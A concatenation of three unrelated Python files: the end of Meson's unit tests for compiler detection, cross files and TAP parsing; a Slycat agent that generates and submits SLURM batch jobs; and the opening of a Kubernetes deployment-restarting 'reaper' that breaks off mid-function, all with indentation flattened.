@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
                    # There is an ICC for Windows (Windows build, Linux host),
                    # but we don't support that ATM, so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functioality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
Check that the Clang compiler is at least a specified version, whether AppleClang or regular Clang.
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
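# Illustrative usage (the call site below is hypothetical, not from this file): gate a test
# on a minimum Clang release, with a separate floor for AppleClang's versioning scheme.
#   if not _clang_at_least(cc, '>=10.0.0', '>=12.0.0'):
#       raise unittest.SkipTest('requires a newer clang')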
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
pass
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
sys.exit(main())
|
slycat-docker-agent.py
|
#!/bin/env python
# Copyright (c) 2013, 2018 National Technology and Engineering Solutions of Sandia, LLC . Under the terms of Contract
# DE-NA0003525 with National Technology and Engineering Solutions of Sandia, LLC, the U.S. Government
# retains certain rights in this software.
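# NOTE: the try/except import below is a Python 2/3 compatibility leftover; on Python 3 the
# first import always succeeds, so the except branch never runs and StringIO is unused here.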
try:
import io as StringIO
except ImportError:
import io
import json
import os
import subprocess
import sys
import tempfile
import agent
import threading
import traceback
import logging
import random
class Agent(agent.Agent):
"""
"""
def __init__(self):
"""
add the list of scripts we want to be able to call
"""
agent.Agent.__init__(self)
self.command_list = ["module_name", "wckey", "nnodes", "partition", "ntasks_per_node",
"time_hours", "time_minutes", "time_seconds", "working_dir"]
def get_hpc_run_string(self, command):
pass
def check_hpc_params(self, command_dict):
for _ in self.command_list:
if _ not in command_dict:
raise Exception("missing %s hpc param" % _)
def run_remote_command(self, command):
command = command["command"]
run_commands = []
# get the command scripts that were sent to the agent
jid = random.randint(10000000, 99999999)
log = self.create_job_logger(jid)
for command_script in command["scripts"]:
# compare the payload commands to the registered commands on the agent
if command_script != "":
run_commands.append(self.get_script_run_string(command_script) + " --log_file " + str(jid) + ".log")
if not run_commands:
results = {"ok": False, "message": "could not create a run command did you register your script with "
"slycat?"}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
return
command["run_command"] = run_commands
# if "background_task" in command and command["background_task"]:
output = ["running task in background", "running task in background"]
if command["hpc"]["is_hpc_job"]:
self.check_hpc_params(command["hpc"]["parameters"])
module_name = command["hpc"]["parameters"]["module_name"]
wckey = command["hpc"]["parameters"]["wckey"]
nnodes = command["hpc"]["parameters"]["nnodes"]
partition = command["hpc"]["parameters"]["partition"]
ntasks_per_node = command["hpc"]["parameters"]["ntasks_per_node"]
time_hours = command["hpc"]["parameters"]["time_hours"]
time_minutes = command["hpc"]["parameters"]["time_minutes"]
time_seconds = command["hpc"]["parameters"]["time_seconds"]
working_dir = command["hpc"]["parameters"]["working_dir"]
output = ["running batch job", "running batch job"]
try:
self.run_shell_command("mkdir -p %s" % working_dir)
except Exception as e:
output[0] = str(e)  # Exception.message does not exist on Python 3
tmp_file = tempfile.NamedTemporaryFile(delete=False, dir=working_dir)
self.generate_batch(module_name, wckey, nnodes, partition, ntasks_per_node, time_hours, time_minutes,
time_seconds, run_commands,
tmp_file)
# with open(tmp_file.name, 'r') as myfile:
# data = myfile.read().replace('\n', '')
output[0], output[1] = self.run_shell_command("sbatch %s" % tmp_file.name, jid, True)
else:
try:
log("[COMMAND length] %s" % len(run_commands))
for command in run_commands:
log("[COMMAND] %s" % command)
background_thread = threading.Thread(target=self.run_shell_command, args=(command, jid, True,))
background_thread.start()
except Exception as e:
output[0] = traceback.format_exc()
results = {
"message": "ran the remote command",
"ok": True,
"jid": jid,
"command": command,
"output": output[0],
"errors": output[1],
"log_file_path": os.path.abspath(str(jid) + ".log"),
"available_scripts": [
{
"name": script["name"],
"description": script["description"],
"parameters": script["parameters"]
}
for script in self.scripts]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def run_shell_command(self, command, jid=0, log_to_file=False):
# create log file in the users directory for later polling
if log_to_file:
log = self.create_job_logger(jid)
try:
if log_to_file:
log("[STARTED]")
command = command.split(' ')
# remove empty values (a list comprehension avoids mutating the list while iterating over it)
command = [token for token in command if token != ""]
# open process to run script
p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if log_to_file:
log("[RUNNING]")
# execute script
value1, value2 = p.communicate()
if log_to_file:
log(str(value1))
log("[FINISHED]")
return value1, value2
else:
return value1, value2
except Exception:
if log_to_file: log("[FAILED]")
return ["FAILED", "FAILED"]
# print traceback.format_exc()
def check_agent_job(self, command):
results = {
"ok": True,
"jid": command["command"]["jid"],
"status": "[UNKNOWN]",
"status_list": self._status_list
}
try:
with open(str(command["command"]["jid"]) + '.log') as log_file:
for line in log_file:
if line.strip(' \t\n\r') in self._status_list:
results["status"] = line.strip(' \t\n\r')
except IOError:
sys.stdout.write("%s\n" % json.dumps({"ok": False, "message": "file not found: job id log file is "
"probably missung"}))
sys.stdout.flush()
except Exception as e:
self.log.log(logging.INFO, traceback.format_exc())
sys.stdout.write("%s\n" % json.dumps({"ok": False, "message": e}))
sys.stdout.flush()
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def launch(self, command):
output = self.run_shell_command(command["command"])
results = {
"ok": True,
"command": command["command"],
"output": output[0],
"errors": output[1]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def submit_batch(self, command):
output = self.run_shell_command(command["command"])
results = {
"ok": True,
"filename": command["command"],
"output": output[0],
"errors": output[1]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def checkjob(self, command):
results = {
"ok": True,
"jid": command["command"]
}
try:
# /job_log.txt
results["output"], results["errors"] = ("COMPLETED", "COMPLETED")
except OSError as e:
sys.stdout.write("%s\n" % json.dumps({"ok": False, "message": e}))
sys.stdout.flush()
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def cancel_job(self, command):
output = self.run_shell_command("scancel %s" % command["command"]) # command is jid here
results = {
"ok": True,
"jid": command["command"],
"output": output[0],
"errors": output[1]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def get_job_output(self, command):
results = {
"ok": True,
"jid": command["command"]["jid"]
}
path = command["command"]["path"]
f = path + "slurm-%s.out" % results["jid"]
if os.path.isfile(f):
results["output"], results["errors"] = self.run_shell_command("cat %s" % f)
else:
results["output"] = "see errors"
results["errors"] = "the file %s does not exist." % f
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def generate_batch(self, module_name, wckey, nnodes, partition, ntasks_per_node, time_hours, time_minutes,
time_seconds, fn,
tmp_file):
f = tmp_file
f.write("#!/bin/bash\n\n")
f.write("export SLYCAT_HOME=\/home\/slycat\/src\/slycat\n")
f.write("#SBATCH --account=%s\n" % wckey)
f.write("#SBATCH --job-name=slycat-tmp\n")
f.write("#SBATCH --partition=%s\n\n" % partition)
f.write("#SBATCH --nodes=%s\n" % nnodes)
f.write("#SBATCH --ntasks-per-node=%s\n" % ntasks_per_node)
f.write("#SBATCH --time=%s:%s:%s\n" % (time_hours, time_minutes, time_seconds))
f.write("echo \"RUNNING\" > job_log.txt\n")
# f.write("ipython profile create\n")
# f.write("echo \"Creating profile ${profile}\"\n")
# f.write("ipcontroller --ip='*' &\n")
# f.write("ipcluster start -n 4&\n")
f.write("echo \"Launching controller\"\n")
f.write("echo \"RUNNING\" > job_log.txt\n")
f.write("sleep 1m\n")
f.write("echo \"Launching job\"\n")
for c in fn:
f.write("%s >> outfile.txt\n" % c)
f.write("echo \"COMPLETE\" > job_log.txt\n")
# f.write("pkill -f ipcontroller \n")
# f.write("pkill -f ipcluster \n")
# f.write("pkill -f python \n")
f.close()
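# For orientation only (hypothetical values: wckey='projA', partition='short', nnodes=1,
# ntasks_per_node=4, time 01:00:00), the generated batch file starts roughly like:
#   #!/bin/bash
#   #SBATCH --account=projA
#   #SBATCH --partition=short
#   #SBATCH --nodes=1
#   #SBATCH --ntasks-per-node=4
#   #SBATCH --time=01:00:00
#   export SLYCAT_HOME=/home/slycat/src/slycat
#   ...
# followed by the echo/sleep bookkeeping and one line per registered command.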
def remote_command(self, command):
"""
command to be run on the remote machine
:param command: json command
:return:
"""
pass
def run_function(self, command):
results = {
"ok": True,
"output": -1,
"temp_file": ""
}
module_name = command["command"]["module_name"]
wckey = command["command"]["wckey"]
nnodes = command["command"]["nnodes"]
partition = command["command"]["partition"]
ntasks_per_node = command["command"]["ntasks_per_node"]
time_hours = command["command"]["time_hours"]
time_minutes = command["command"]["time_minutes"]
time_seconds = command["command"]["time_seconds"]
fn = command["command"]["fn"]
# uid = command["command"]["uid"]
working_dir = command["command"]["working_dir"]
try:
self.run_shell_command("mkdir -p %s" % working_dir)
except Exception:
pass
tmp_file = tempfile.NamedTemporaryFile(delete=False, dir=working_dir)
self.generate_batch(module_name, wckey, nnodes, partition, ntasks_per_node, time_hours, time_minutes,
time_seconds, fn,
tmp_file)
with open(tmp_file.name, 'r') as myfile:
data = myfile.read().replace('\n', '')
results["temp_file"] = data
self.run_shell_command("chmod 755 %s" % tmp_file.name)
# print "starting"
# print tmp_file.name
try:
# print (".%s &> /dev/null" % tmp_file.name)
# p = Process(target=self.run_shell_command, args=(("sh %s >> outfile.txt" % tmp_file.name),))
# p.start()
t = threading.Thread(target=self.run_shell_command, args=("sh %s &>/dev/null &; disown" % tmp_file.name,))
t.start()
results["working_dir"] = working_dir
results["errors"] = None
results["output"] = "1234567 aids"
except Exception:
raise
# print "running"
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
if __name__ == "__main__":
slurm_cluster_agent = Agent()
slurm_cluster_agent.run()
|
reaper.py
|
#!/usr/bin/env python3
import logging
import os
import signal
import sys
import threading
import click
import typing
from datetime import datetime
from kubernetes import client, config
from util import label_selector, parse_time, parse_duration, time_to_str
from logging import getLogger
logger = getLogger(__name__)
log_stream_handler = logging.StreamHandler(stream=sys.stdout)
log_stream_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
logger.addHandler(log_stream_handler)
@click.command()
@click.pass_context
@click.option('--dryrun', '-n', is_flag=True, help="Do not restart, only log events")
@click.option('--verbose', '-v', count=True, help="Change the verbosity of the logs")
@click.option('--interval', '-i', required=True, type=click.STRING, default='60s', envvar='DEPLOYMENT_REAPER_INTERVAL', help='How often a reaping cycle should occur')
@click.option('--backoff-period', required=True, type=click.STRING, default='5m', envvar='DEPLOYMENT_REAPER_BACKOFF_PERIOD', help='The duration between the time a deployment is restarted and allowed to be restarted again')
@click.option('--default-max-age', required=True, type=click.STRING, envvar='DEPLOYMENT_REAPER_DEFAULT_MAX_AGE', help='The default maximum age of a container if no max-age label is provided')
def reaper(context, dryrun, verbose, interval, backoff_period, default_max_age):
context.obj = {
'dryrun': dryrun,
'verbosity': verbose,
'interval': interval,
'backoff_period': backoff_period,
'default_max_age': default_max_age,
'managed_label': os.getenv('', 'reaper.kubernetes.io/managed'),
'max_age_label': os.getenv('', 'reaper.kubernetes.io/max-age'),
'restart_label': os.getenv('', 'reaper.kubernetes.io/restarted-on'),
}
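# NOTE: the env-var names in the three os.getenv('') calls above appear to be missing;
# os.getenv('') always returns the hard-coded reaper.kubernetes.io/... default.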
logger.setLevel(max(0, 20 - (verbose * 10)))
config.load_kube_config()
cycle(context)
stopped = threading.Event()
def loop():
while not stopped.wait(parse_duration(interval).seconds):
cycle(context)
signal.signal(signal.SIGINT, lambda sig, frame: stopped.set())
runner = threading.Thread(target=loop)
runner.daemon = True
runner.start()
runner.join()
def cycle(ctx):
logger.info('Cycling has started')
managed_objects = get_managed_objects(ctx)
logger.debug('will process %d found objects' % (len(managed_objects),))
for managed_object in managed_objects:
if object_aged(ctx, managed_object):
if not should_backoff(ctx, managed_object):
if ctx.obj['dryrun']:
logger.info('would restart object %s/%s' % (managed_object.metadata.namespace, managed_object.metadata.name))
else:
logger.info('restarting object %s/%s' % (managed_object.metadata.namespace, managed_object.metadata.name))
restart_managed_object(ctx, managed_object)
else:
logger.debug('backing off restart of object %s/%s' % (managed_object.metadata.namespace, managed_object.metadata.name))
else:
logger.debug('object %s/%s has not aged enough' % (managed_object.metadata.namespace, managed_object.metadata.name))
logger.info('Cycling has completed')
def should_backoff(ctx, managed_object: typing.Union[client.V1Deployment, client.V1DaemonSet]) -> bool:
if ctx.obj['restart_label'] in managed_object.metadata.annotations.keys():
last_restarted = parse_time(managed_object.metadata.annotations[ctx.obj['restart_label']])
backoff_period = parse_duration(ctx.obj['backoff_period'])
if datetime.utcnow() < last_restarted + backoff_period:
return True
return False
def get_managed_objects(ctx) -> typing.List[typing.Union[client.V1Deployment, client.V1DaemonSet]]:
apps = client.AppsV1Api()
selector = label_selector({
ctx.obj['managed_label']: True
})
deployments = apps.list_deployment_for_all_namespaces(label_selector=selector, watch=False)
daemonsets = apps.list_daemon_set_for_all_namespaces(label_selector=selector, watch=False)
return deployments.items + daemonsets.items
def objects_max_age(ctx, obj: typing.Union[client.V1Deployment, client.V1DaemonSet]):
if ctx.obj['max_age_label'] in obj.metadata.labels:
return parse_duration(obj.metadata.labels[ctx.obj['max_age_label']])
return parse_duration(ctx.obj['default_max_age'])
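# Illustrative example (duration format assumed to follow util.parse_duration, e.g. '12h'):
# a deployment labeled reaper.kubernetes.io/max-age=12h is considered aged, and therefore
# restarted, once one of its running pods has existed for more than 12 hours.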
def object_aged(ctx, obj: typing.Union[client.V1Deployment, client.V1DaemonSet]) -> bool:
max_age = objects_max_age(ctx, obj)
core = client.CoreV1Api()
pods = core.list_namespaced_pod(namespace=obj.metadata.namespace, label_selector=label_selector(obj.spec.selector.match_labels))
